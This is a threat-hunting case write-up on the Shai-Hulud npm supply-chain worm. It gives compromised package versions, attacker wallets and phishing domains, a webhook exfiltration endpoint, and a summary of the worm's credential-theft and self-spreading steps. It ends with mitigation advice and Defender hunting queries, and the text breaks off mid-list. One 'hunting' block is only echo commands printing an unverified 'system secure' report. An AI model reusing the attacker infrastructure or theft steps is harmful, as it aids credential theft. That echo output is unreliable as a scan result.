# Hunter-Case-06 - Shai-Hulud Worm NPM Package Supply Chain
## - Shai-Hulud: The novel self-replicating worm infecting hundreds of NPM packages
## 1.) Information
**Hunter Blue's** day started everyday with researching the cyber security news for new Threat Huntings tasks to execute them on customer datalakes.
-> Interesting report from sysdig:
\>>>>>>Once executed, this novel worm — dubbed Shai-Hulud — steals credentials, exfiltrates them, and attempts to find additional NPM packages in which to copy itself. The malicious code also attempts to leak data on GitHub by making private repositories public.<<<<<<
**You should investigate the initial Entry and Execution to search through the logs with these IoCs / IoAs to find the right artifacts for Threat Hunting.**
### 1.1) Information Links and Research
*
*
*
**Compromised npm Packages and Versions but many more are affected**
The following packages were confirmed to include malicious code on September 8, 2025. Only the versions listed below are known to be compromised.
**Color & Styling Utilities**
* chalk\@5.6.1 – Style and color terminal output (≈300M weekly downloads).
* chalk-template\@1.1.1 – Template literal support for chalk (≈3.9M weekly).
* ansi-styles\@6.2.2 – ANSI escape codes for colors and styles (≈371M weekly).
* supports-color\@10.2.1 – Detect terminal color support (≈287M weekly).
* color-convert\@3.1.1 – Convert between RGB, HSL, HEX (≈193M weekly).
* color-string\@2.1.1 – Parse CSS color strings (≈27M weekly).
* color-name\@2.0.1 – CSS color name to RGB mappings (≈191M weekly).
* color\@5.0.1 – General color conversion/manipulation.
**ANSI / Terminal String Handling**
* ansi-regex\@6.2.1 – Regex to match ANSI escape codes (≈243M weekly).
* strip-ansi\@7.1.1 – Remove ANSI codes from strings (≈261M weekly).
* slice-ansi\@7.1.1 – Slice strings safely with ANSI sequences (≈59M weekly).
* wrap-ansi\@9.0.1 – Wrap text with ANSI sequences preserved (≈197M weekly).
* has-ansi\@6.0.1 – Detect ANSI codes in strings (≈12M weekly).
**General Utilities**
* simple-swizzle\@0.2.3 – Normalize arguments into arrays (≈26M weekly).
* is-arrayish\@0.3.3 – Check if a value is array-like (≈73M weekly).
* backslash\@0.2.1 – Normalize Windows path backslashes (≈0.26M weekly).
* error-ex\@1.3.3 – Create error objects with custom properties.
**Debugging & Logging**
* debug\@4.4.2 – Namespace-based logging utility (≈357M weekly).
* supports-hyperlinks\@4.1.1 – Detect terminal hyperlink support (≈19M weekly).
**Experimental / Miscellaneous**
* proto-tinker-wc\@0.1.87 – Prototype Web Components for testing.
* @duckdb/node-api\@1.3.3, @duckdb/node-bindings\@1.3.3, duckdb\@1.3.3, @duckdb/duckdb-wasm\@1.29.2 – Database components.
* prebid.js\@10.9.2, prebid-universal-creative, prebid\@latest – Ad tech libraries.
**Attacker-Controlled Cryptocurrency Wallets**
Ethereum (ETH)
* 0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976 (primary)
* 0xa29eeFb3f21Dc8FA8bce065Db4f4354AA683c024
* 0x40C351B989113646bc4e9Dfe66AE66D24fE6Da7B
Bitcoin (BTC)
* 1H13VnQJKtT4HjD5ZFKaaiZEetMbG7nDHx
* bc1qms4f8ys8c4z47h0q29nnmyekc9r74u5ypqw6wm
Solana
* 5VVyuV5K6c2gMq1zVeQUFAmo8shPZH28MJCVzccrsZG6
**Function Selectors Targeted (Ethereum)**
* 0x095ea7b3 – approve()
* 0xa9059cbb – transfer()
* 0x23b872dd – transferFrom()
* 0xd505accf – permit()
**Malware Code Characteristics**
* Hooks into fetch(), XMLHttpRequest, and window\.ethereum.request.
* Environment checks for browser objects (typeof window !== ‘undefined’).
* Levenshtein algorithm for wallet address substitution.
* Hidden control object: window\.stealthProxyControl.
**Phishing Infrastructure**
* Domain: npmjs\[.]help
* IP: 185.7.81.108
* Email: support\[at]npmjs\[dot]help
* Malicious CDN: static-mw-host.b-cdn\[.]net, img-data-backup.b-cdn\[.]net
* Remote host: websocket-api2.publicvm\[.]com
* Example phishing URL: ;
## 2.) Indicators of Compromise
### Indicators of compromise
| Type | Value | Notes / usage |
| -------------------- | ------------------------------------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| SHA256 | `46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09` | Malicious `bundle.js` listed in report. [Unit 42](https://unit42.paloaltonetworks.com/npm-supply-chain-attack/) |
| SHA256 | `b74caeaa75e077c99f7d44f46daaf9796a3be43ecf24f2a1fd381844669da777` | IOC from report. [Unit 42](https://unit42.paloaltonetworks.com/npm-supply-chain-attack/) |
| SHA256 | `dc67467a39b70d1cd4c1f7f7a459b35058163592f4a9e8fb4dffcbba98ef210c` | IOC from report. [Unit 42](https://unit42.paloaltonetworks.com/npm-supply-chain-attack/) |
| SHA256 | `4b2399646573bb737c4969563303d8ee2e9ddbd1b271f1ca9e35ea78062538db` | IOC from report. [Unit 42](https://unit42.paloaltonetworks.com/npm-supply-chain-attack/) |
| URL (webhook) | `https://webhook[.]site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7` | C2 / exfil endpoint used by the malware. Use `webhook.site` (dot replaced) when searching. [Unit 42](https://unit42.paloaltonetworks.com/npm-supply-chain-attack/) |
| Filename / Workflow | `shai-hulud-workflow.yml` | Malicious YAML workflow filename called out. [Unit 42](https://unit42.paloaltonetworks.com/npm-supply-chain-attack/) |
| GitHub repo name | `Shai-Hulud` | Malware creates public repo named `Shai-Hulud` to publish exfiltrated secrets. [Unit 42](https://unit42.paloaltonetworks.com/npm-supply-chain-attack/) |
| Tool abuse indicator | `trufflehog` | Legit tool abused by actors for secrets discovery — hunt for usage. [Unit 42](https://unit42.paloaltonetworks.com/npm-supply-chain-attack/) |
* Tool: trufflehog execution
* Defender XDR Hunting
* Other SOC Customer Case where Defender already flagged the malicious npm packages
### 2.1) Executions from Threat Actor - Steps
* worm executes during the post-install phase of the compromised NPM packages, running a huge bundle.js script
* code targets Linux and macOS machines, performing multiple operations in parallel to spread itself in the NPM package registry and steal sensitive information like credentials
* Shai-Hulud conducts local system discovery
* searching for sensitive details on the machine, including GitHub and NPM credentials, as well as credentials for AWS and GCP
* spread itself and compromise other ecosystems
* worm uses the GitHub user and their credentials ( ghp\_\* and gho\_\* tokens), iterating over the repositories belonging to the user
* gain persistence and steal their associated secrets via a malicious GitHub action that is invoked on a “push” action
* receive the credentials, the site is used
* trufflehog binary is downloaded and used to search for other sensitive credentials in the filesystem
* Shai-Hulud also contains code that looks for AWS and GCP credentials, searching both locally in the file system and any Instance Metadata Service (IMDS) endpoints
* malicious JavaScript checks again if the GitHub user is authenticated. If so, it creates a new GitHub repository named “Shai-Hulud”, where the previously found credentials are uploaded in a base64 encoded JSON file
### 2.2) Indicators of Compromise - Executions
```
#IOCs
ProcessCommandLine
sh -c "node bundle.js"
InitiatingProcessCommandLine
node /Users//.nvm/versions/node/v20.14.0/bin/npm install
Trufflehog Tool execution modification (rights) - Tool to search for Api keys, credentials, tokens,
chmod +x /Users//Workspaces/ivf/platform/frontend/apps/client-ivf/node_modules/@nativescript-community/ui-pulltorefresh/trufflehog
Trufflehog extraction
ProcessCommandLine
tar -xzf /Users//Workspaces/ivf/platform/frontend/apps/client-ivf/node_modules/@nativescript-community/ui-pulltorefresh/trufflehog_3.90.6_darwin_arm64.tar.gz -C /Users//Workspaces/ivf/platform/frontend/apps/client-ivf/node_modules/@nativescript-community/ui-pulltorefresh trufflehog
Other Cases
Filepath
/home/devops-agent-1/.npm/_cacache/content-v2/sha512/34/b8/00d4fe26f80010b9a7ad0ca97cf7d8709cf41df1c1745e37c85ffcdd3206bf92079a9d1167d0c3f6fc76ccc4f60d7897242a207fd4ce032e96f55d259cbc
npm (and the underlying cacache) stores downloaded package content in a content-addressable cache under ~/.npm/_cacache/content-v2/sha512///.
The path encodes a sha512-derived key (the 34/b8/... prefix is just sharding of the hash).
The file itself typically contains the compressed package tarball (or a data blob) as fetched from the registry (registry.npmjs.org, github, or mirrors).
```
## 3.) Initial Access
* worm executes during the post-install phase of the compromised NPM packages, running a huge **bundle.js** script
## 4.) Finding through Threat Hunting
* We hunted through the Datalake logs in the whole infrastructure and yes you guess it right we found a malicious execution not related to legit admin tasks which was also confirmed by the system owner (macOS user), so we saved the "life" of this company.
## 5.) Mitigation
**Strengthen Supply Chain Controls**
* Pin dependencies to verified versions and use ‘npm ci’ instead of ‘npm install’ to enforce lockfile consistency. While this strengthens supplychain integrity, it adds complexity for developers (slower iteration, lockfile conflicts, harder testing of new versions). Whether to enforce strict reproducibility should be decided based on each team’s risk appetite and operational needs.
* Conduct security awareness training for developers to identify phishing and credential harvesting attempts. Include this case-study to demonstrate the risk.
* Integrate automated dependency scanning tools (e.g., Snyk, Semgrep, Mend.io, Socket.dev) into CI/CD pipelines to flag malicious or anomalous packages early.
* Mirror critical open-source packages in private registries and vet updates before internal distribution.
**Rebuild and Redeploy**
* Recompile and redeploy all applications that previously included compromised dependencies to remove malicious code from runtime environments.
* For web applications, publish clean client-side builds immediately to eliminate malware exposure for new sessions.
**Remove and Replace Malicious Packages**
* Uninstall compromised versions immediately and upgrade to patched releases (e.g., chalk\@5.6.2 or later).
* If a patch is not out yet, roll back to the last known good version before the incident (e.g., downgrade ansi-regex\@6.2.1 to 6.0.0) and lock your dependency there.
* Perform a clean reinstall:
* Delete the node\_modules directory.
* Clear the npm cache.
* Regenerate lockfiles to ensure all code is sourced from trusted versions.
**HOST and user**
* reset all passwords
* clear NPM Cache
* remove NPM node\_modules
* generate new package-lock.json
* rotate All Tokens
* restage the host
**Secure Secrets and Tokens**
Assume that secrets may have been exfiltrated from ‘build’ or ‘runtime’ environments where compromised packages were present.
* Rotate all private keys, API tokens, and credentials used in affected CI/CD pipelines and applications.
**Audit Dependencies**
* Inventory all applications, services, and build pipelines for use of affected package versions.
* Use lockfiles (package-lock.json, yarn.lock) or a Software Composition Analysis (SCA) tool to pinpoint instances of vulnerable packages.
* Use a read-only dependency scanner to identify compromised package versions listed in this advisory. For example, the [Open Tools Vulnerable Packages Scanner](https://github.com.mcas.ms/knostic/open-tools/tree/main/vulnerable_packages_scanner) supports npm, yarn, pnpm, and bun lockfiles, generates a JSON report, and can be integrated into CI pipelines to fail builds when a match is detected.
* Begin with a scan only or dry run mode. Once confirmed, replace affected packages, regenerate lockfiles, and redeploy updated applications.
## 6.) Detection and Hunting
### 6.1) Sigma Rules
```cpp
###will follow
```
### 6.2) Linux Commandline Hunting
```
###
/bin/bash -c -l 'source /home/tux/.user/shell-snapshots/snapshot-bash-snapshot.sh && eval 'echo "========================================" && echo "🔒 VOLLSTÄNDIGER SICHERHEITSBERICHT 🔒" && echo "========================================" && echo "" && echo "✅ SYSTEM VOLLSTÄNDIG SICHER!" && echo "" && echo "ALLE 19 KOMPROMITTIERTEN PAKETE ÜBERPRÜFT:" && echo "" && echo "✅ ansi-regex@6.2.1 - NICHT GEFUNDEN" && echo "✅ ansi-styles@6.2.2 - NICHT GEFUNDEN" && echo "✅ backslash@0.2.1 - NICHT GEFUNDEN" && echo "✅ chalk@5.6.1 - NICHT GEFUNDEN" && echo "✅ chalk-template@1.1.1 - NICHT GEFUNDEN" && echo "✅ color@5.0.1 - NICHT GEFUNDEN" && echo "✅ color-convert@3.1.1 - NICHT GEFUNDEN" && echo "✅ color-name@2.0.1 - NICHT GEFUNDEN" && echo "✅ color-string@2.1.1 - NICHT GEFUNDEN" && echo "✅ debug@4.4.2 - NICHT GEFUNDEN" && echo "✅ error-ex@1.3.3 - NICHT GEFUNDEN" && echo "✅ has-ansi@6.0.1 - NICHT GEFUNDEN" && echo "✅ is-arrayish@0.3.3 - NICHT GEFUNDEN" && echo "✅ simple-swizzle@0.2.3 - NICHT GEFUNDEN" && echo "✅ slice-ansi@7.1.1 - NICHT GEFUNDEN" && echo "✅ strip-ansi@7.1.1 - NICHT GEFUNDEN" && echo "✅ supports-color@10.2.1 - NICHT GEFUNDEN" && echo "✅ supports-hyperlinks@4.1.1 - NICHT GEFUNDEN" && echo "✅ wrap-ansi@9.0.1 - NICHT GEFUNDEN" && echo "" && echo "🛡️ SCHUTZSTATUS: VOLLSTÄNDIG GESCHÜTZT" && echo "🔍 MALWARE SCAN: SAUBER" && echo "📦 SICHERE VERSIONEN: INSTALLIERT" && echo "" && echo "========================================"' \< /dev/null && pwd -P >| /tmp/output'
```
### 6.3) Hunting Queries Microsoft Defender XDR
```cpp
###HUNT01 - VER1-Compromised Packages
CommonSecurityLog
| where DestinationHostName == "registry.npmjs.org"
// | where RequestURL has_any ("backslash","chalk-template","supports-hyperlinks","has-ansi","simple-swizzle","color-string","error-ex","color-name","is-arrayish","slice-ansi","color-convert","wrap-ansi","ansi-regex","supports-color","strip-ansi","chalk","debug","ansi-styles", "proto-tinker-wc")
| where RequestURL has_all ("backslash", "0.2.1") or
RequestURL has_all ("chalk-template", "1.1.1") or
RequestURL has_all ("supports-hyperlinks", "4.1.1") or
RequestURL has_all ("has-ansi", "6.0.1") or
RequestURL has_all ("simple-swizzle", "0.2.3") or
RequestURL has_all ("color-string", "2.1.1") or
RequestURL has_all ("error-ex", "1.3.3") or
RequestURL has_all ("color-name", "2.0.1") or
RequestURL has_all ("is-arrayish", "0.3.3") or
RequestURL has_all ("slice-ansi", "7.1.1") or
RequestURL has_all ("color-convert", "3.1.1") or
RequestURL has_all ("wrap-ansi", "9.0.1") or
RequestURL has_all ("ansi-regex", "6.2.1") or
RequestURL has_all ("supports-color", "10.2.1") or
RequestURL has_all ("strip-ansi", "7.1.1") or
RequestURL has_all ("chalk", "5.6.1") or
RequestURL has_all ("debug", "4.4.2") or
RequestURL has_all ("ansi-styles", "6.2.2") or
RequestURL has_all ("proto-tinker-wc", "0.1.87")
| project-reorder TimeGenerated, SourceUserName, RequestURL
###HUNT02 - VER2-Compromised Packages
THANKS TIMO SARKAR ;)
// Hunt for recently compromised npm packages: https://www.ox.security/blog/npm-packages-compromised/ & https://www.aikido.dev/blog/s1ngularity-nx-attackers-strike-again
DeviceProcessEvents
| where ProcessCommandLine has_any (
"@ahmedhfarag/ngx-perfect-scrollbar@20.0.20",
"@ahmedhfarag/ngx-virtual-scroller@4.0.4",
"@art-ws/common@2.0.28",
"@art-ws/config-eslint@2.0.4",
"@art-ws/config-eslint@2.0.5",
"@art-ws/config-ts@2.0.7",
"@art-ws/config-ts@2.0.8",
"@art-ws/db-context@2.0.24",
"@art-ws/di@2.0.28",
"@art-ws/di@2.0.32",
"@art-ws/di-node@2.0.13",
"@art-ws/eslint@1.0.5",
"@art-ws/eslint@1.0.6",
"@art-ws/fastify-http-server@2.0.24",
"@art-ws/fastify-http-server@2.0.27",
"@art-ws/http-server@2.0.21",
"@art-ws/http-server@2.0.25",
"@art-ws/openapi@0.1.9",
"@art-ws/openapi@0.1.12",
"@art-ws/package-base@1.0.5",
"@art-ws/package-base@1.0.6",
"@art-ws/prettier@1.0.5",
"@art-ws/prettier@1.0.6",
"@art-ws/slf@2.0.15",
"@art-ws/slf@2.0.22",
"@art-ws/ssl-info@1.0.9",
"@art-ws/ssl-info@1.0.10",
"@art-ws/web-app@1.0.3",
"@art-ws/web-app@1.0.4",
"@crowdstrike/commitlint@8.1.1",
"@crowdstrike/commitlint@8.1.2",
"@crowdstrike/falcon-shoelace@0.4.1",
"@crowdstrike/falcon-shoelace@0.4.2",
"@crowdstrike/foundry-js@0.19.1",
"@crowdstrike/foundry-js@0.19.2",
"@crowdstrike/glide-core@0.34.2",
"@crowdstrike/glide-core@0.34.3",
"@crowdstrike/logscale-dashboard@1.205.1",
"@crowdstrike/logscale-dashboard@1.205.2",
"@crowdstrike/logscale-file-editor@1.205.1",
"@crowdstrike/logscale-file-editor@1.205.2",
"@crowdstrike/logscale-parser-edit@1.205.1",
"@crowdstrike/logscale-parser-edit@1.205.2",
"@crowdstrike/logscale-search@1.205.1",
"@crowdstrike/logscale-search@1.205.2",
"@crowdstrike/tailwind-toucan-base@5.0.1",
"@crowdstrike/tailwind-toucan-base@5.0.2",
"@ctrl/deluge@7.2.1",
"@ctrl/deluge@7.2.2",
"@ctrl/golang-template@1.4.2",
"@ctrl/golang-template@1.4.3",
"@ctrl/magnet-link@4.0.3",
"@ctrl/magnet-link@4.0.4",
"@ctrl/ngx-codemirror@7.0.1",
"@ctrl/ngx-codemirror@7.0.2",
"@ctrl/ngx-csv@6.0.1",
"@ctrl/ngx-csv@6.0.2",
"@ctrl/ngx-emoji-mart@9.2.1",
"@ctrl/ngx-emoji-mart@9.2.2",
"@ctrl/ngx-rightclick@4.0.1",
"@ctrl/ngx-rightclick@4.0.2",
"@ctrl/qbittorrent@9.7.1",
"@ctrl/qbittorrent@9.7.2",
"@ctrl/react-adsense@2.0.1",
"@ctrl/react-adsense@2.0.2",
"@ctrl/shared-torrent@6.3.1",
"@ctrl/shared-torrent@6.3.2",
"@ctrl/tinycolor@4.1.1",
"@ctrl/tinycolor@4.1.2",
"@ctrl/torrent-file@4.1.1",
"@ctrl/torrent-file@4.1.2",
"@ctrl/transmission@7.3.1",
"@ctrl/ts-base32@4.0.1",
"@ctrl/ts-base32@4.0.2",
"@hestjs/core@0.2.1",
"@hestjs/cqrs@0.1.6",
"@hestjs/demo@0.1.2",
"@hestjs/eslint-config@0.1.2",
"@hestjs/logger@0.1.6",
"@hestjs/scalar@0.1.7",
"@hestjs/validation@0.1.6",
"@nativescript-community/arraybuffers@1.1.6",
"@nativescript-community/arraybuffers@1.1.7",
"@nativescript-community/arraybuffers@1.1.8",
"@nativescript-community/gesturehandler@2.0.35",
"@nativescript-community/perms@3.0.5",
"@nativescript-community/perms@3.0.6",
"@nativescript-community/perms@3.0.7",
"@nativescript-community/perms@3.0.8",
"@nativescript-community/sqlite@3.5.2",
"@nativescript-community/sqlite@3.5.3",
"@nativescript-community/sqlite@3.5.4",
"@nativescript-community/sqlite@3.5.5",
"@nativescript-community/text@1.6.9",
"@nativescript-community/text@1.6.10",
"@nativescript-community/text@1.6.11",
"@nativescript-community/text@1.6.12",
"@nativescript-community/typeorm@0.2.30",
"@nativescript-community/typeorm@0.2.31",
"@nativescript-community/typeorm@0.2.32",
"@nativescript-community/typeorm@0.2.33",
"@nativescript-community/ui-collectionview@6.0.6",
"@nativescript-community/ui-document-picker@1.1.27",
"@nativescript-community/ui-document-picker@1.1.28",
"@nativescript-community/ui-drawer@0.1.30",
"@nativescript-community/ui-image@4.5.6",
"@nativescript-community/ui-label@1.3.35",
"@nativescript-community/ui-label@1.3.36",
"@nativescript-community/ui-label@1.3.37",
"@nativescript-community/ui-material-bottom-navigation@7.2.72",
"@nativescript-community/ui-material-bottom-navigation@7.2.73",
"@nativescript-community/ui-material-bottom-navigation@7.2.74",
"@nativescript-community/ui-material-bottom-navigation@7.2.75",
"@nativescript-community/ui-material-bottomsheet@7.2.72",
"@nativescript-community/ui-material-core@7.2.72",
"@nativescript-community/ui-material-core@7.2.73",
"@nativescript-community/ui-material-core@7.2.74",
"@nativescript-community/ui-material-core@7.2.75",
"@nativescript-community/ui-material-core-tabs@7.2.72",
"@nativescript-community/ui-material-core-tabs@7.2.73",
"@nativescript-community/ui-material-core-tabs@7.2.74",
"@nativescript-community/ui-material-core-tabs@7.2.75",
"@nativescript-community/ui-material-ripple@7.2.72",
"@nativescript-community/ui-material-ripple@7.2.73",
"@nativescript-community/ui-material-ripple@7.2.74",
"@nativescript-community/ui-material-ripple@7.2.75",
"@nativescript-community/ui-material-tabs@7.2.72",
"@nativescript-community/ui-material-tabs@7.2.73",
"@nativescript-community/ui-material-tabs@7.2.74",
"@nativescript-community/ui-material-tabs@7.2.75",
"@nativescript-community/ui-pager@14.1.36",
"@nativescript-community/ui-pager@14.1.37",
"@nativescript-community/ui-pager@14.1.38",
"@nativescript-community/ui-pulltorefresh@2.5.4",
"@nativescript-community/ui-pulltorefresh@2.5.5",
"@nativescript-community/ui-pulltorefresh@2.5.6",
"@nativescript-community/ui-pulltorefresh@2.5.7",
"@nexe/config-manager@0.1.1",
"@nexe/eslint-config@0.1.1",
"@nexe/logger@0.1.3",
"@nstudio/angular@20.0.4",
"@nstudio/angular@20.0.5",
"@nstudio/angular@20.0.6",
"@nstudio/focus@20.0.4",
"@nstudio/focus@20.0.5",
"@nstudio/focus@20.0.6",
"@nstudio/nativescript-checkbox@2.0.6",
"@nstudio/nativescript-checkbox@2.0.7",
"@nstudio/nativescript-checkbox@2.0.8",
"@nstudio/nativescript-checkbox@2.0.9",
"@nstudio/nativescript-loading-indicator@5.0.1",
"@nstudio/nativescript-loading-indicator@5.0.2",
"@nstudio/nativescript-loading-indicator@5.0.3",
"@nstudio/nativescript-loading-indicator@5.0.4",
"@nstudio/ui-collectionview@5.1.11",
"@nstudio/ui-collectionview@5.1.12",
"@nstudio/ui-collectionview@5.1.13",
"@nstudio/ui-collectionview@5.1.14",
"@nstudio/web@20.0.4",
"@nstudio/web-angular@20.0.4",
"@nstudio/xplat@20.0.5",
"@nstudio/xplat@20.0.6",
"@nstudio/xplat@20.0.7",
"@nstudio/xplat-utils@20.0.5",
"@nstudio/xplat-utils@20.0.6",
"@nstudio/xplat-utils@20.0.7",
"@operato/board@9.0.36",
"@operato/board@9.0.37",
"@operato/board@9.0.38",
"@operato/board@9.0.39",
"@operato/board@9.0.40",
"@operato/board@9.0.41",
"@operato/board@9.0.42",
"@operato/board@9.0.43",
"@operato/board@9.0.44",
"@operato/board@9.0.45",
"@operato/board@9.0.46",
"@operato/data-grist@9.0.29",
"@operato/data-grist@9.0.35",
"@operato/data-grist@9.0.36",
"@operato/data-grist@9.0.37",
"@operato/graphql@9.0.22",
"@operato/graphql@9.0.35",
"@operato/graphql@9.0.36",
"@operato/graphql@9.0.37",
"@operato/graphql@9.0.38",
"@operato/graphql@9.0.39",
"@operato/graphql@9.0.40",
"@operato/graphql@9.0.41",
"@operato/graphql@9.0.42",
"@operato/graphql@9.0.43",
"@operato/graphql@9.0.44",
"@operato/graphql@9.0.45",
"@operato/graphql@9.0.46",
"@operato/headroom@9.0.2",
"@operato/headroom@9.0.35",
"@operato/headroom@9.0.36",
"@operato/headroom@9.0.37",
"@operato/help@9.0.35",
"@operato/help@9.0.36",
"@operato/help@9.0.37",
"@operato/help@9.0.38",
"@operato/help@9.0.39",
"@operato/help@9.0.40",
"@operato/help@9.0.41",
"@operato/help@9.0.42",
"@operato/help@9.0.43",
"@operato/help@9.0.44",
"@operato/help@9.0.45",
"@operato/help@9.0.46",
"@operato/i18n@9.0.35",
"@operato/i18n@9.0.36",
"@operato/i18n@9.0.37",
"@operato/input@9.0.27",
"@operato/input@9.0.35",
"@operato/input@9.0.36",
"@operato/input@9.0.37",
"@operato/input@9.0.38",
"@operato/input@9.0.39",
"@operato/input@9.0.40",
"@operato/input@9.0.41",
"@operato/input@9.0.42",
"@operato/input@9.0.43",
"@operato/input@9.0.44",
"@operato/input@9.0.45",
"@operato/input@9.0.46",
"@operato/layout@9.0.35",
"@operato/layout@9.0.36",
"@operato/layout@9.0.37",
"@operato/popup@9.0.22",
"@operato/popup@9.0.35",
"@operato/popup@9.0.36",
"@operato/popup@9.0.37",
"@operato/popup@9.0.38",
"@operato/popup@9.0.39",
"@operato/popup@9.0.40",
"@operato/popup@9.0.41",
"@operato/popup@9.0.42",
"@operato/popup@9.0.43",
"@operato/popup@9.0.44",
"@operato/popup@9.0.45",
"@operato/popup@9.0.46",
"@operato/pull-to-refresh@9.0.36",
"@operato/pull-to-refresh@9.0.37",
"@operato/pull-to-refresh@9.0.38",
"@operato/pull-to-refresh@9.0.39",
"@operato/pull-to-refresh@9.0.40",
"@operato/pull-to-refresh@9.0.41",
"@operato/pull-to-refresh@9.0.42",
"@operato/shell@9.0.22",
"@operato/shell@9.0.35",
"@operato/shell@9.0.36",
"@operato/shell@9.0.37",
"@operato/shell@9.0.38",
"@operato/shell@9.0.39",
"@operato/styles@9.0.2",
"@operato/styles@9.0.35",
"@operato/styles@9.0.36",
"@operato/styles@9.0.37",
"@operato/utils@9.0.22",
"@operato/utils@9.0.35",
"@operato/utils@9.0.36",
"@operato/utils@9.0.37",
"@operato/utils@9.0.38",
"@operato/utils@9.0.39",
"@operato/utils@9.0.40",
"@operato/utils@9.0.41",
"@operato/utils@9.0.42",
"@operato/utils@9.0.43",
"@operato/utils@9.0.44",
"@operato/utils@9.0.45",
"@operato/utils@9.0.46",
"@teselagen/bounce-loader@0.3.16",
"@teselagen/bounce-loader@0.3.17",
"@teselagen/liquibase-tools@0.4.1",
"@teselagen/range-utils@0.3.14",
"@teselagen/range-utils@0.3.15",
"@teselagen/react-list@0.8.19",
"@teselagen/react-list@0.8.20",
"@teselagen/react-table@6.10.19",
"@thangved/callback-window@1.1.4",
"@things-factory/attachment-base@9.0.43",
"@things-factory/attachment-base@9.0.44",
"@things-factory/attachment-base@9.0.45",
"@things-factory/attachment-base@9.0.46",
"@things-factory/attachment-base@9.0.47",
"@things-factory/attachment-base@9.0.48",
"@things-factory/attachment-base@9.0.49",
"@things-factory/attachment-base@9.0.50",
"@things-factory/auth-base@9.0.43",
"@things-factory/auth-base@9.0.44",
"@things-factory/auth-base@9.0.45",
"@things-factory/email-base@9.0.42",
"@things-factory/email-base@9.0.43",
"@things-factory/email-base@9.0.44",
"@things-factory/email-base@9.0.45",
"@things-factory/email-base@9.0.46",
"@things-factory/email-base@9.0.47",
"@things-factory/email-base@9.0.48",
"@things-factory/email-base@9.0.49",
"@things-factory/email-base@9.0.50",
"@things-factory/email-base@9.0.51",
"@things-factory/email-base@9.0.52",
"@things-factory/email-base@9.0.53",
"@things-factory/email-base@9.0.54",
"@things-factory/env@9.0.42",
"@things-factory/env@9.0.43",
"@things-factory/env@9.0.44",
"@things-factory/env@9.0.45",
"@things-factory/integration-base@9.0.43",
"@things-factory/integration-base@9.0.44",
"@things-factory/integration-base@9.0.45",
"@things-factory/integration-marketplace@9.0.43",
"@things-factory/integration-marketplace@9.0.44",
"@things-factory/integration-marketplace@9.0.45",
"@things-factory/shell@9.0.43",
"@things-factory/shell@9.0.44",
"@things-factory/shell@9.0.45",
"@tnf-dev/api@1.0.8",
"@tnf-dev/core@1.0.8",
"@tnf-dev/js@1.0.8",
"@tnf-dev/mui@1.0.8",
"@tnf-dev/react@1.0.8",
"@ui-ux-gang/devextreme-angular-rpk@24.1.7",
"@yoobic/design-system@6.5.17",
"@yoobic/jpeg-camera-es6@1.0.13",
"@yoobic/yobi@8.7.53",
"airchief@0.3.1",
"airpilot@0.8.8",
"angulartics2@14.1.1",
"angulartics2@14.1.2",
"browser-webdriver-downloader@3.0.8",
"capacitor-notificationhandler@0.0.2",
"capacitor-notificationhandler@0.0.3",
"capacitor-plugin-healthapp@0.0.2",
"capacitor-plugin-healthapp@0.0.3",
"capacitor-plugin-ihealth@1.1.8",
"capacitor-plugin-ihealth@1.1.9",
"capacitor-plugin-vonage@1.0.2",
"capacitor-plugin-vonage@1.0.3",
"capacitorandroidpermissions@0.0.4",
"capacitorandroidpermissions@0.0.5",
"config-cordova@0.8.5",
"cordova-plugin-voxeet2@1.0.24",
"cordova-voxeet@1.0.32",
"create-hest-app@0.1.9",
"db-evo@1.1.4",
"db-evo@1.1.5",
"devextreme-angular-rpk@21.2.8",
"ember-browser-services@5.0.2",
"ember-browser-services@5.0.3",
"ember-headless-form@1.1.2",
"ember-headless-form@1.1.3",
"ember-headless-form-yup@1.0.1",
"ember-headless-table@2.1.5",
"ember-headless-table@2.1.6",
"ember-url-hash-polyfill@1.0.12",
"ember-url-hash-polyfill@1.0.13",
"ember-velcro@2.2.1",
"ember-velcro@2.2.2",
"encounter-playground@0.0.2",
"encounter-playground@0.0.3",
"encounter-playground@0.0.4",
"encounter-playground@0.0.5",
"eslint-config-crowdstrike@11.0.2",
"eslint-config-crowdstrike@11.0.3",
"eslint-config-crowdstrike-node@4.0.3",
"eslint-config-crowdstrike-node@4.0.4",
"eslint-config-teselagen@6.1.7",
"globalize-rpk@1.7.4",
"graphql-sequelize-teselagen@5.3.8",
"html-to-base64-image@1.0.2",
"json-rules-engine-simplified@0.2.1",
"jumpgate@0.0.2",
"koa2-swagger-ui@5.11.1",
"koa2-swagger-ui@5.11.2",
"mcfly-semantic-release@1.3.1",
"mcp-knowledge-base@0.0.2",
"mcp-knowledge-graph@1.2.1",
"mobioffice-cli@1.0.3",
"monorepo-next@13.0.1",
"monorepo-next@13.0.2",
"mstate-angular@0.4.4",
"mstate-cli@0.4.7",
"mstate-dev-react@1.1.1",
"mstate-react@1.6.5",
"ng2-file-upload@7.0.2",
"ng2-file-upload@7.0.3",
"ng2-file-upload@8.0.1",
"ng2-file-upload@8.0.2",
"ng2-file-upload@8.0.3",
"ng2-file-upload@9.0.1",
"ngx-bootstrap@18.1.4",
"ngx-bootstrap@19.0.3",
"ngx-bootstrap@19.0.4",
"ngx-bootstrap@20.0.3",
"ngx-bootstrap@20.0.4",
"ngx-bootstrap@20.0.5",
"ngx-color@10.0.1",
"ngx-color@10.0.2",
"ngx-toastr@19.0.1",
"ngx-toastr@19.0.2",
"ngx-trend@8.0.1",
"ngx-ws@1.1.5",
"ngx-ws@1.1.6",
"oradm-to-gql@35.0.14",
"oradm-to-gql@35.0.15",
"oradm-to-sqlz@1.1.2",
"ove-auto-annotate@0.0.9",
"pm2-gelf-json@1.0.4",
"pm2-gelf-json@1.0.5",
"printjs-rpk@1.6.1",
"react-complaint-image@0.0.32",
"react-jsonschema-form-conditionals@0.3.18",
"remark-preset-lint-crowdstrike@4.0.1",
"remark-preset-lint-crowdstrike@4.0.2",
"rxnt-authentication@0.0.3",
"rxnt-authentication@0.0.4",
"rxnt-authentication@0.0.5",
"rxnt-authentication@0.0.6",
"rxnt-healthchecks-nestjs@1.0.2",
"rxnt-healthchecks-nestjs@1.0.3",
"rxnt-healthchecks-nestjs@1.0.4",
"rxnt-healthchecks-nestjs@1.0.5",
"rxnt-kue@1.0.4",
"rxnt-kue@1.0.5",
"rxnt-kue@1.0.6",
"rxnt-kue@1.0.7",
